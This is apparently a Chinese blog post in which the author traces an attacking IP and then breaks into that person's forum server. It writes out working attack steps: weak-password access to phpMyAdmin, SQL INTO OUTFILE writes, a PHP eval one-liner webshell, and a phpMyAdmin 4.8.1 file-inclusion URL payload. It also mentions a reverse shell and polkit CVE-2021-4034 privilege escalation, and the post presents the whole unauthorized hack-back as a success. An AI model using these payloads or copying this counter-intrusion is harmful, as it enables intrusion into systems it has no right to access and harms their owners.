记录一次曲折的溯源反制

事件起因

这个事件的起因是安全设备告警，说有人对服务器进行了攻击，然后就给了我一个IP 让我溯源和反制,过程还是挺曲折和复杂的 写篇博客记录一下，文章中涉及到的敏感信息已经进行了去敏化处理

先看一下情报社区有啥能直接用的信息

这人居然绑了域名，访问一下 还是个论坛

信息收集一波 小扫一个目录 有好东西

访问 弱口令进去后

事情到这里都很顺利

来 sql执行直接一个

MySQL> show global variables like '%secure_file_priv%';

可以往任意路径写文件 哎 单走一个6
因为报错信息返回了

因此我再接一个 大威天 不对

MySQL> select '<?php phpinfo(); ?>' into outfile '/var/www/html/info.php';

事情就开始诡异起来了 然后我猜了半天路径不对 看来只能另寻他法

然后 我看到了

这个版本有一个文件包含，然后我们只需要写入一个一句话再包含这个一句话木马就OK了，有利用文章说是 先创建一个表 表里包含一个字段 这个字段名为一句话的代码<?php @eval($_GET['s']);?> 然后mysql目录下会生成一个frm文件 然后包含此文件就可以控制webshell，数据库的路径可以用此语句查询：
show variables like '%datadir%';

他给出的payload：http://127.0.0.1/phpMyAdmin-4.8.1-english/index.php?s=phpinfo();&target=db_datadict.php%25%33%66/../../../bin/mysql/mysql5.7.21/data/test/shell.frm 但是可能是因为他是windows 我这边是linux的问题，复现并没有成功

峰回路转

由SQL语句查询数据库路径我们可知这个是由lampp搭建的服务，所以我去搜了一下默认的web安装路径
在opt/lampp/htdocs下
写一个phpinfo试试

芜湖~本以为已经可以结束了，访问info1.php 结果出现404，我猜测可能是中间还有一层目录，但是我通过语句也把shell写入了，这个时候就得提到这个文件包含漏洞
最终payload

http://xxxx/phpmyadmin/index.php?s=phpinfo();&target=db_datadict.php%253f../../../../../opt/lampp/htdocs/shell1.php

这个s相当于是webshell的密码
反弹一个shell回来

polkit提权 https://github.com/signfind/CVE-2021-4034
需要编译执行，此地方注意 我第一次复现的时候在windows本地编译后通过FTP上传执行 提权会失败，后来我直接通过FTP命令在linux主机上传输就完全没有问题

查一下外联IP和SSH连接日志 less /var/log/secure |grep'Accepted' 和 netstat -anp |grep EST 发现没有由价值的 信息，所以此次溯源到此结束